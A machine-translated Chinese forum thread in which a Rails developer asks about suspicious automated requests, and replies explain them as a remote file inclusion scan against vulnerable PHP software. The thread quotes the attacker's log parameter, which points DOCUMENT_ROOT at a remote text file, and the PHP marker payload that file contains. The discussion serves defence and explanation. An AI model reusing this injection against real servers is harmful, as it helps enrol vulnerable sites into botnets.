最近我一直在发现很多奇怪的请求,比如我的Rails应用程序:
Processing ApplicationController#index (for 189.30.242.61 at 2009-12-14 07:38:24) [GET] Parameters: {"_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???"}} ActionController::RoutingError (No route matches "/browse/brand/nike ///" with {:method=>:get}): 它看起来像自动化,因为我得到了他们很多,并注意到他们试图发送奇怪的参数:
_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???
这是恶意的,如果是的话,我应该怎么办?
如果你打开韩文服务器上的引用文件(我可能不应该,但是我做了);它说:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
在网上search,看起来这是Joomla,Wordpress和/或Firestats的一个漏洞(不同的网站提到了不同的目标)。 如果您正在运行其中任何一项,请确保升级到最新版本。
更多信息在这里: http : //urbanoalvarez.es/blog/2009/09/24/feelcomz-rfi/和在这里: http : //tech.sweetnam.eu/2009/06/firestats-wordpress-exploit/
这不是一个漏洞:它只是试图find允许replace$_SERVER['DOCUMENT_ROOT'] PHPvariables的易受攻击的服务器。
这是这样工作的:如果服务器是脆弱的,“FeeLCoMz”打印到页面上。 它被发送请求的脚本检测到,并且该站点被添加到服务器的数据库中,这将很快成为自豪的僵尸networking成员:)
上面粘贴的Sean Earp代码只是一个testing代码,看你的系统是否易受攻击。 那么,如果你的系统很脆弱,主攻就会来临。 您的系统受攻击者控制。 攻击者使你的系统成为他的朋友的IRC服务器,并与他人共享你的所有文件。 或将您的系统用作攻击其他IP号码的受害者。 或删除您拥有的所有内容,或者取出您的密码,或欺骗您的客户端数据等等。有一篇关于解码和解剖远程代码注入攻击的文章。
我也跟随了一段时间找出FeelComz是谁。 我发现了一个可怜的印度尼西亚孩子在昼夜在irc网站上玩耍。 他在一个名为Friendster的印尼网站上有个人页面。 似乎他感谢你在海啸之后给他的国家所做的援助。